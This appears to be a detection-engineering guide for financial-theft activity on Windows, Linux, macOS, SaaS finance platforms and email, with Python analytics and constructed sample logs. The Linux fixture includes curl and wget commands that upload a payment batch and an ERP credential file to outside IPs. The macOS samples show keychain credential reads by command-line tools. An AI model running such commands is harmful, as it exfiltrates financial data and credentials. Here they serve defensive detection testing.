Monitor Windows endpoints for anomalous access to financial applications, browser-based banking sessions, or enterprise ERP systems: finance executables started by parents outside their usual baseline, and logons by finance or executive accounts from unfamiliar hosts or outside normal hours. Also detect mass emailing of payment instructions, sudden Outlook rule changes on financial staff mailboxes, and clipboard access that reads or replaces cryptocurrency wallet addresses.
| Data Component | Name | Channel |
|---|---|---|
| Logon Session Creation (DC0067) | WinEventLog:Security | EventCode=4624 |
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |

| Field | Description |
|---|---|
| FinanceAppList | Baseline of finance-related executables or ERP processes to monitor closely. |
| HighRiskAccounts | Accounts belonging to finance, treasury, or executives that should be monitored with higher sensitivity. |
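The two data components above can be turned into a concrete analytic by keeping a baseline of which parent images normally launch each entry in FinanceAppList and which workstations each HighRiskAccounts member normally logs on from. The following is an added example, not code from the page or from ATT&CK: it runs both checks over constructed Sysmon EventCode=1 and Security EventCode=4624 events shaped like the Splunk-style fields. The baseline values (saplogon.exe, qbw32.exe, the CORP accounts and hostnames, the business-hours window) are hypothetical.

```python
import os
from datetime import datetime, time
from typing import Dict, List, Optional

# Hypothetical values standing in for the page's mutable elements (not a real baseline).
# FinanceAppList: finance/ERP executables mapped to the parent images that normally start them.
FINANCE_APP_LIST = {
    "saplogon.exe": {"explorer.exe"},
    "qbw32.exe": {"explorer.exe"},
}
# HighRiskAccounts: finance, treasury and executive accounts watched with higher sensitivity.
HIGH_RISK_ACCOUNTS = {"corp\\treasury.ops", "corp\\cfo"}
# Workstations each high-risk account is known to log on from (assumed baseline).
KNOWN_WORKSTATIONS = {"corp\\treasury.ops": {"FIN-WS-01"}, "corp\\cfo": {"EXEC-LT-03"}}
BUSINESS_HOURS = (time(7, 0), time(19, 0))
REMOTE_LOGON_TYPES = {"3", "10"}  # 3 = network, 10 = RemoteInteractive (RDP)


def _image_name(path: str) -> str:
    return os.path.basename(path.replace("\\", "/")).lower()


def check_sysmon_process(ev: Dict) -> Optional[str]:
    """Sysmon EventCode=1: a finance application started by a parent outside its baseline."""
    if ev.get("EventCode") != 1:
        return None
    image, parent = _image_name(ev["Image"]), _image_name(ev["ParentImage"])
    allowed = FINANCE_APP_LIST.get(image)
    if allowed is None or parent in allowed:
        return None
    return f"{ev['UtcTime']} {ev['User']}: {image} launched by unexpected parent {parent}"


def check_security_logon(ev: Dict) -> Optional[str]:
    """Security EventCode=4624: a high-risk account logging on remotely off-hours or from an unknown host."""
    if ev.get("EventCode") != 4624:
        return None
    account = f"{ev['TargetDomainName']}\\{ev['TargetUserName']}".lower()
    if account not in HIGH_RISK_ACCOUNTS or ev["LogonType"] not in REMOTE_LOGON_TYPES:
        return None
    ts = datetime.fromisoformat(ev["TimeCreated"])
    reasons = []
    if ev["WorkstationName"].upper() not in KNOWN_WORKSTATIONS.get(account, set()):
        reasons.append(f"unknown workstation {ev['WorkstationName']}")
    if not BUSINESS_HOURS[0] <= ts.time() <= BUSINESS_HOURS[1]:
        reasons.append("outside business hours")
    if not reasons:
        return None
    return (f"{ev['TimeCreated']} {account}: logon type {ev['LogonType']} "
            f"from {ev['IpAddress']} ({'; '.join(reasons)})")


def analyze(events: List[Dict]) -> List[str]:
    """Run both checks over a mixed stream of Security and Sysmon events."""
    alerts = []
    for ev in events:
        for check in (check_sysmon_process, check_security_logon):
            hit = check(ev)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed sample events (not real telemetry), using Sysmon EID 1 and Security 4624 field names.
SAMPLE_EVENTS = [
    {"EventCode": 1, "UtcTime": "2024-05-06 09:02:11", "User": "CORP\\treasury.ops",
     "Image": "C:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe",
     "ParentImage": "C:\\Windows\\explorer.exe"},
    {"EventCode": 1, "UtcTime": "2024-05-06 09:05:40", "User": "CORP\\treasury.ops",
     "Image": "C:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe",
     "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"},
    {"EventCode": 4624, "TimeCreated": "2024-05-06T10:15:00", "TargetDomainName": "CORP",
     "TargetUserName": "treasury.ops", "LogonType": "10", "IpAddress": "10.1.5.20",
     "WorkstationName": "FIN-WS-01"},
    {"EventCode": 4624, "TimeCreated": "2024-05-06T02:47:13", "TargetDomainName": "CORP",
     "TargetUserName": "cfo", "LogonType": "10", "IpAddress": "10.9.200.77",
     "WorkstationName": "WS-TEMP-19"},
    {"EventCode": 4624, "TimeCreated": "2024-05-06T11:00:00", "TargetDomainName": "CORP",
     "TargetUserName": "jdoe", "LogonType": "10", "IpAddress": "10.9.200.78",
     "WorkstationName": "WS-TEMP-20"},
]

if __name__ == "__main__":
    for alert in analyze(SAMPLE_EVENTS):
        print(alert)
```

Only the second and fourth sample events fire: SAP GUI launched from PowerShell, and the CFO account arriving by RDP at 02:47 from a workstation not in its baseline. The regular daytime logon from FIN-WS-01 and the logon by an account outside HighRiskAccounts stay silent, which is the point of scoping the sensitive checks to the listed accounts.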
Monitor Linux server and endpoint logs for unusual outbound connections to cryptocurrency nodes, unauthorized scripts accessing financial systems, or automation that targets payment file formats. Detect curl/wget invocations that send transaction data or credentials from financial applications to hosts outside the known finance set.
| Data Component | Name | Channel |
|---|---|---|
| Command Execution (DC0064) | auditd:SYSCALL | execve: Execution of curl, wget, or custom scripts accessing financial endpoints |
| Application Log Content (DC0038) | linux:syslog | Authentication attempts into finance-related servers from unusual IPs or times |

| Field | Description |
|---|---|
| KnownFinanceIPs | Whitelisted IPs for finance-related traffic to reduce noise. |
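auditd splits one execve into a SYSCALL record (uid, exe, key) and an EXECVE record (argv) that share an audit serial, so the analytic has to join them before it can reason about what curl or wget was asked to do. The following is an added example, not code from the page: it parses constructed auditd lines, rebuilds argv, and flags curl/wget runs that push local data to a host outside KnownFinanceIPs, plus interpreters running scripts under a finance directory as an unexpected uid. The IP set, the finance paths, the allowed uid and the audit key name are hypothetical.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Hypothetical values standing in for the page's mutable elements.
KNOWN_FINANCE_IPS = {"10.20.30.40", "10.20.30.41"}   # KnownFinanceIPs: hosts finance tooling may talk to
FINANCE_PATHS = ("/srv/finance/", "/var/lib/erp/")     # directories holding payment and ledger data (assumed)
ALLOWED_FINANCE_UIDS = {"1001"}                         # service account allowed to run finance scripts (assumed)
# Options that make curl/wget send local data instead of just fetching a URL.
UPLOAD_FLAGS = {"-d", "--data", "--data-binary", "--data-raw", "-F", "--form", "-T",
                "--upload-file", "--post-file", "--post-data"}

_MSG = re.compile(r"msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\)")
_KV = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_audit_line(line: str) -> Dict[str, str]:
    """Split one auditd record into key/value pairs; quotes are stripped, the serial kept for joining.
    Arguments auditd hex-encodes (those containing spaces or quotes) are not decoded here."""
    fields = {k: v.strip('"') for k, v in _KV.findall(line)}
    m = _MSG.search(line)
    if m:
        fields["serial"], fields["ts"] = m.group("serial"), m.group("ts")
    return fields


def join_records(lines: List[str]) -> List[Dict]:
    """Merge the SYSCALL and EXECVE records that share an audit serial into one event with argv."""
    events: Dict[str, Dict] = {}
    for line in lines:
        if not line.strip():
            continue
        rec = parse_audit_line(line)
        ev = events.setdefault(rec["serial"], {"serial": rec["serial"], "argv": []})
        if rec.get("type") == "EXECVE":
            ev["argv"] = [rec[f"a{i}"] for i in range(int(rec["argc"]))]
        else:  # SYSCALL carries uid, exe, key; its a0-a3 are raw registers, not argv
            ev.update(rec)
    return list(events.values())


def check_exec(ev: Dict) -> Optional[str]:
    argv = ev.get("argv") or []
    if not argv:
        return None
    tool, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    reasons = []
    if tool in ("curl", "wget"):
        hosts = [urlparse(a).hostname for a in args if a.startswith(("http://", "https://", "ftp://"))]
        unknown = [h for h in hosts if h not in KNOWN_FINANCE_IPS]
        uploading = any(a.split("=", 1)[0] in UPLOAD_FLAGS for a in args)
        touches_finance = any(p in a for a in args for p in FINANCE_PATHS)
        if unknown and (uploading or touches_finance):
            reasons.append(f"{tool} sending local data to non-finance host {unknown[0]}")
    elif tool in ("python3", "python", "perl", "bash", "sh"):
        scripts = [a for a in args if a.startswith(FINANCE_PATHS)]
        if scripts and ev.get("uid") not in ALLOWED_FINANCE_UIDS:
            reasons.append(f"{tool} running {scripts[0]} as uid {ev.get('uid')} (not an allowed finance uid)")
    if not reasons:
        return None
    return f"audit {ev['serial']} exe={ev.get('exe', '?')}: " + "; ".join(reasons)


def scan(audit_text: str) -> List[str]:
    return [a for a in (check_exec(ev) for ev in join_records(audit_text.splitlines())) if a]


# Constructed auditd records (not real captures); the "finance_exec" key is an assumed audit rule.
SAMPLE_AUDIT = """\
type=SYSCALL msg=audit(1715000000.101:2001): arch=c000003e syscall=59 success=yes exit=0 uid=1001 auid=1001 comm="curl" exe="/usr/bin/curl" key="finance_exec"
type=EXECVE msg=audit(1715000000.101:2001): argc=3 a0="curl" a1="-s" a2="https://10.20.30.40/api/rates"
type=SYSCALL msg=audit(1715000000.205:2002): arch=c000003e syscall=59 success=yes exit=0 uid=1001 auid=1001 comm="curl" exe="/usr/bin/curl" key="finance_exec"
type=EXECVE msg=audit(1715000000.205:2002): argc=5 a0="curl" a1="-s" a2="-d" a3="@/srv/finance/payments_batch.csv" a4="https://203.0.113.9/upload"
type=SYSCALL msg=audit(1715000000.310:2003): arch=c000003e syscall=59 success=yes exit=0 uid=33 auid=4294967295 comm="wget" exe="/usr/bin/wget" key="finance_exec"
type=EXECVE msg=audit(1715000000.310:2003): argc=3 a0="wget" a1="--post-file=/var/lib/erp/creds.txt" a2="http://198.51.100.5/c"
type=SYSCALL msg=audit(1715000000.420:2004): arch=c000003e syscall=59 success=yes exit=0 uid=33 auid=4294967295 comm="python3" exe="/usr/bin/python3" key="finance_exec"
type=EXECVE msg=audit(1715000000.420:2004): argc=2 a0="python3" a1="/srv/finance/export_ledger.py"
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_AUDIT):
        print(alert)
```

The first curl (a plain GET to a known finance host) is ignored, which is what the KnownFinanceIPs whitelist is for; the upload of a payment batch to 203.0.113.9, the wget --post-file of an ERP credential file, and the ledger export script run as the web server uid are reported. Because the fetch/upload distinction rests on argv, make sure the audit rule records EXECVE and not only the SYSCALL line.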
Monitor the macOS unified log for access to payment applications, browser plug-ins, or Apple Pay services from non-standard processes. Detect anomalous use of Automator scripts, and keychain reads that target financial account credentials from processes that do not normally access them.
| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | macos:unifiedlog | Non-standard processes invoking financial applications or payment APIs |
| Application Log Content (DC0038) | macos:unifiedlog | Anomalous keychain access attempts targeting payment credentials |

| Field | Description |
|---|---|
| MonitoredApps | Financial or payment applications to explicitly monitor for unauthorized use. |
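On macOS the useful signal is which process asked securityd for a given keychain item, compared against the accessors MonitoredApps says are legitimate. The following is an added example, not code from the page: it reads constructed lines laid out like `log show --style syslog` output, extracts the requesting client and item label, and flags monitored items read by an unexpected process as well as command-line dump tools (security, osascript, automator) reading anything payment-related. The wording of the securityd message body, the item labels and the application paths are illustrative assumptions, so the regexes will need adjusting to the real log text in your environment.

```python
import re
from typing import Dict, List, Optional

# Hypothetical values standing in for the page's mutable elements (not real keychain data).
# MonitoredApps: payment-related keychain items (matched by label substring) and the
# processes expected to read them.
MONITORED_APPS = {
    "treasury-portal.example.com": {"/Applications/Safari.app/Contents/MacOS/Safari"},
    "erp.example.com": {"/Applications/ERP Client.app/Contents/MacOS/ERP Client"},
}
PAYMENT_TERMS = ("bank", "treasury", "payment", "wallet", "erp")
# Command-line and scripting clients that have no business reading payment credentials.
DUMP_TOOLS = {"/usr/bin/security", "/usr/bin/osascript", "/usr/bin/automator"}

# Header layout follows `log show --style syslog`; the securityd message wording is illustrative only.
_LINE = re.compile(r"^(?P<ts>\S+ \S+)\s+(?P<host>\S+)\s+(?P<proc>[^\[\s]+)\[(?P<pid>\d+)\]: (?P<msg>.*)$")
_ACCESS = re.compile(r'client "(?P<client>[^"]+)" pid=(?P<cpid>\d+) requested item "(?P<item>[^"]+)"')


def parse_keychain_access(line: str) -> Optional[Dict[str, str]]:
    """Return the client/item pair from a securityd keychain-access line, or None for anything else."""
    m = _LINE.match(line)
    if not m or m.group("proc") != "securityd":
        return None
    a = _ACCESS.search(m.group("msg"))
    if not a:
        return None
    return {"ts": m.group("ts"), "host": m.group("host"), **a.groupdict()}


def assess(access: Dict[str, str]) -> Optional[str]:
    """Flag reads of monitored items by unexpected processes, and dump tools touching anything payment-like."""
    item, client = access["item"], access["client"]
    expected = next((apps for label, apps in MONITORED_APPS.items() if label in item), None)
    if expected is not None:
        if client in expected:
            return None
        reason = f"unexpected accessor of monitored item {item!r}"
    elif client in DUMP_TOOLS and any(t in item.lower() for t in PAYMENT_TERMS):
        reason = f"dump tool reading payment-related item {item!r}"
    else:
        return None
    severity = "high" if client in DUMP_TOOLS else "medium"
    return f"[{severity}] {access['ts']} {access['host']}: {client} (pid {access['cpid']}) {reason}"


def scan(log_text: str) -> List[str]:
    alerts = []
    for line in log_text.splitlines():
        access = parse_keychain_access(line)
        if access:
            hit = assess(access)
            if hit:
                alerts.append(hit)
    return alerts


# Constructed log lines (not real output); the kernel line shows non-securityd noise being skipped.
SAMPLE_LOG = """\
2024-05-06 09:12:01.103311+0000 mac-fin-01 securityd[140]: (Security) [com.apple.securityd:keychain] client "/Applications/Safari.app/Contents/MacOS/Safari" pid=812 requested item "treasury-portal.example.com" (kSecClassInternetPassword)
2024-05-06 09:14:22.558210+0000 mac-fin-01 securityd[140]: (Security) [com.apple.securityd:keychain] client "/usr/bin/security" pid=4412 requested item "treasury-portal.example.com" (kSecClassInternetPassword)
2024-05-06 09:14:23.001900+0000 mac-fin-01 kernel[0]: (Sandbox) [com.apple.sandbox.reporting:violation] Sandbox: quicklookd(330) deny(1) file-read-data
2024-05-06 09:20:05.740000+0000 mac-fin-01 securityd[140]: (Security) [com.apple.securityd:keychain] client "/private/tmp/.update/helper" pid=4477 requested item "erp.example.com" (kSecClassInternetPassword)
2024-05-06 09:21:40.112000+0000 mac-fin-01 securityd[140]: (Security) [com.apple.securityd:keychain] client "/usr/bin/osascript" pid=4490 requested item "bank-wallet-backup" (kSecClassGenericPassword)
2024-05-06 09:25:00.000000+0000 mac-fin-01 securityd[140]: (Security) [com.apple.securityd:keychain] client "/Applications/Safari.app/Contents/MacOS/Safari" pid=812 requested item "wifi-guest" (kSecClassGenericPassword)
"""

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

Safari reading the treasury portal credential and the Wi-Fi password is normal; the `security` CLI reading the same portal credential, an updater binary in /private/tmp reading the ERP item, and osascript pulling a wallet backup are the three findings, with the two dump-tool cases rated high.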
Monitor SaaS financial systems (e.g., QuickBooks, Workday, SAP S/4HANA Cloud) for unauthorized access, rule changes, or mass export of financial data. Detect anomalous transfers initiated through SaaS APIs, and logins to finance applications from accounts whose MFA was recently disabled.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | saas:finance | Transaction/Transfer: Unusual or large transactions initiated outside business hours or by unusual accounts |

| Field | Description |
|---|---|
| TransactionThreshold | Customizable monetary threshold above which financial transactions should be flagged. |
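The transaction analytic needs three reference points rather than one: the TransactionThreshold, the business-hours window, and a baseline of which accounts normally initiate transfers; the MFA condition additionally needs state, because "login without MFA" is only interesting shortly after an MFA-disable event for that same account. The following is an added example, not code from the page or from any vendor SDK: it evaluates a constructed, vendor-neutral event stream (login, MFA change, transfer, export) in time order. The threshold, row limit, hours, initiator set and the event field names are assumptions.

```python
from datetime import datetime, time, timedelta
from typing import Dict, List

# Hypothetical values standing in for the page's mutable elements.
TRANSACTION_THRESHOLD = 25_000.00      # TransactionThreshold: flag transfers above this amount
EXPORT_ROW_THRESHOLD = 5_000           # rows per export before it counts as a mass export (assumed)
BUSINESS_HOURS = (time(8, 0), time(18, 0))
KNOWN_INITIATORS = {"ap.clerk@example.com", "treasury@example.com"}  # accounts that normally move money (assumed)
MFA_WINDOW = timedelta(hours=24)       # how long after an MFA-disable a no-MFA login stays suspicious


def evaluate(events: List[Dict]) -> List[str]:
    """Walk the SaaS finance log in time order and emit one alert string per suspicious event."""
    alerts: List[str] = []
    mfa_disabled_at: Dict[str, datetime] = {}
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(ev["ts"])
        actor, action = ev["actor"], ev["action"]
        if action == "MFADisabled":
            # Remember who lost MFA and when; the alert fires on the login that follows.
            mfa_disabled_at[ev["target"]] = ts
        elif action == "Login" and not ev.get("mfa", True):
            disabled_at = mfa_disabled_at.get(actor)
            if disabled_at and ts - disabled_at <= MFA_WINDOW:
                minutes = int((ts - disabled_at).total_seconds() // 60)
                alerts.append(f"{ev['ts']} {actor}: login without MFA {minutes} min after MFA was disabled "
                              f"(from {ev['ip']})")
        elif action == "Transfer":
            reasons = []
            if ev["amount"] > TRANSACTION_THRESHOLD:
                reasons.append(f"amount {ev['amount']:,.2f} above threshold")
            if not BUSINESS_HOURS[0] <= ts.time() <= BUSINESS_HOURS[1]:
                reasons.append("outside business hours")
            if actor not in KNOWN_INITIATORS:
                reasons.append("actor does not normally initiate transfers")
            if reasons:
                alerts.append(f"{ev['ts']} {actor}: transfer of {ev['amount']:,.2f} to {ev['beneficiary']} "
                              f"({'; '.join(reasons)})")
        elif action == "Export" and ev["rows"] > EXPORT_ROW_THRESHOLD:
            alerts.append(f"{ev['ts']} {actor}: mass export of {ev['rows']} rows ({ev['dataset']})")
    return alerts


# Constructed events (not from any real tenant), deliberately out of order to exercise the sort.
SAMPLE_EVENTS = [
    {"ts": "2024-05-06T23:40:00", "actor": "contractor@example.com", "action": "Transfer",
     "amount": 48000.00, "beneficiary": "New Beneficiary Ltd"},
    {"ts": "2024-05-06T09:15:00", "actor": "treasury@example.com", "action": "Login", "mfa": True, "ip": "10.4.0.12"},
    {"ts": "2024-05-06T10:30:00", "actor": "ap.clerk@example.com", "action": "Transfer",
     "amount": 12000.00, "beneficiary": "Vendor A"},
    {"ts": "2024-05-06T11:05:00", "actor": "admin@example.com", "action": "MFADisabled", "target": "contractor@example.com"},
    {"ts": "2024-05-06T11:20:00", "actor": "contractor@example.com", "action": "Login", "mfa": False, "ip": "198.51.100.22"},
    {"ts": "2024-05-06T14:00:00", "actor": "treasury@example.com", "action": "Export", "rows": 12000, "dataset": "vendor_master"},
]

if __name__ == "__main__":
    for alert in evaluate(SAMPLE_EVENTS):
        print(alert)
```

The routine daytime transfer by the AP clerk produces nothing; the contractor's no-MFA login 15 minutes after an admin disabled MFA, the 12,000-row vendor master export, and the 48,000 late-night transfer by an account that never initiates payments each produce one alert, the last with all three reasons attached so an analyst can see why it scored.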
Monitor email and document management systems for fraudulent invoices, vendor impersonation, or BEC-style payment redirection. Detect abnormal edits to invoice or payment templates, and emails that combine known fraud language with an attachment, especially when addressed to finance staff.
| Data Component | Name | Channel |
|---|---|---|
| Application Log Content (DC0038) | m365:unified | MailSend: Outlook messages with suspicious subject/body terms (e.g., urgent payment, wire transfer) targeting finance teams |
| File Modification (DC0061) | m365:office | Anomalous editing of invoice or payment document templates |

| Field | Description |
|---|---|
| FraudTerms | Adjustable keyword list for email and document fraud detection. |
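A flat keyword match on FraudTerms is noisy on its own; the analytic described above only becomes useful when the language is scored together with the other BEC signals: a payment-style attachment, finance recipients, and a sender domain that imitates a known vendor. The following is an added example, not code from the page or from Microsoft: it scores constructed messages and alerts above a threshold. Note that Exchange mailbox-audit "Send" records do not carry message bodies, so a feed with subject, body and attachment names (mail-flow rule, DLP, or a journaling copy) is assumed; the weights, the finance mailboxes and the vendor domain are hypothetical.

```python
import re
from difflib import SequenceMatcher
from typing import Dict, List, Optional

# Hypothetical values standing in for the page's mutable elements.
# FraudTerms: phrase -> weight. Tune to the organisation's own observed fraud language.
FRAUD_TERMS = {
    "urgent payment": 3, "wire transfer": 3, "updated bank details": 4,
    "change of account": 4, "before end of day": 2, "confidential": 1, "invoice attached": 1,
}
FINANCE_TEAM = {"ap@example.com", "treasury@example.com"}   # assumed finance mailboxes
KNOWN_VENDOR_DOMAINS = {"acme-supplies.com"}                 # assumed vendor master
PAYMENT_ATTACHMENT = re.compile(r"(invoice|remittance|bank.?details).*\.(pdf|docx?|xlsx?)$", re.I)
ALERT_THRESHOLD = 5


def lookalike(domain: str) -> Optional[str]:
    """Return the vendor domain this sender domain imitates (same name on another TLD, or near-identical), else None."""
    d = domain.lower()
    if d in KNOWN_VENDOR_DOMAINS:
        return None
    name = d.rsplit(".", 1)[0]
    for known in KNOWN_VENDOR_DOMAINS:
        kname = known.rsplit(".", 1)[0]
        if name == kname or SequenceMatcher(None, name, kname).ratio() >= 0.8:
            return known
    return None


def score_message(msg: Dict) -> Dict:
    """Combine fraud language, payment-style attachments, finance recipients and vendor impersonation."""
    text = f"{msg['Subject']} {msg['Body']}".lower()
    hits = [t for t in FRAUD_TERMS if t in text]
    score = sum(FRAUD_TERMS[t] for t in hits)
    reasons = [f"fraud terms: {', '.join(hits)}"] if hits else []
    attachments = [a for a in msg.get("Attachments", []) if PAYMENT_ATTACHMENT.search(a)]
    if attachments and hits:  # fraud language plus a payment document is the pattern the page describes
        score += 2
        reasons.append(f"payment attachment {attachments[0]}")
    if {r.lower() for r in msg["Recipients"]} & FINANCE_TEAM:
        score += 1
        reasons.append("addressed to finance team")
    sender_domain = msg["Sender"].rsplit("@", 1)[-1]
    imitated = lookalike(sender_domain)
    if imitated:
        score += 4
        reasons.append(f"sender domain {sender_domain} resembles vendor {imitated}")
    return {"id": msg["Id"], "score": score, "alert": score >= ALERT_THRESHOLD, "reasons": reasons}


def triage(messages: List[Dict]) -> List[Dict]:
    return [score_message(m) for m in messages]


# Constructed messages (not real mail). The second imitates the vendor with "i" for "l" in the domain.
SAMPLE_MESSAGES = [
    {"Id": "m1", "Sender": "billing@acme-supplies.com", "Recipients": ["ap@example.com"],
     "Subject": "Invoice 4471 attached", "Body": "Please find invoice attached. Net 30 as usual.",
     "Attachments": ["invoice_4471.pdf"]},
    {"Id": "m2", "Sender": "accounts@acme-suppiies.com", "Recipients": ["ap@example.com"],
     "Subject": "URGENT payment - updated bank details",
     "Body": "Our bank details changed, please process the wire transfer before end of day. Confidential.",
     "Attachments": ["New_Bank_Details.pdf"]},
    {"Id": "m3", "Sender": "hr@example.com", "Recipients": ["all-staff@example.com"],
     "Subject": "Confidential: benefits enrolment", "Body": "Please review the confidential changes by Friday.",
     "Attachments": []},
    {"Id": "m4", "Sender": "ceo.example@gmail.com", "Recipients": ["treasury@example.com"],
     "Subject": "Urgent payment needed",
     "Body": "I need you to process a wire transfer today. Keep this confidential.",
     "Attachments": []},
]

if __name__ == "__main__":
    for result in triage(SAMPLE_MESSAGES):
        print(result)
```

The genuine vendor invoice scores 4 and stays under the threshold even though it matches a term, has a payment attachment and goes to AP; the lookalike-domain bank-details change scores far above it; an internal HR note with "confidential" scores 1; and the free-mail "CEO" wire request scores 8 on language and targeting alone, which is the classic BEC case the FraudTerms list exists to catch.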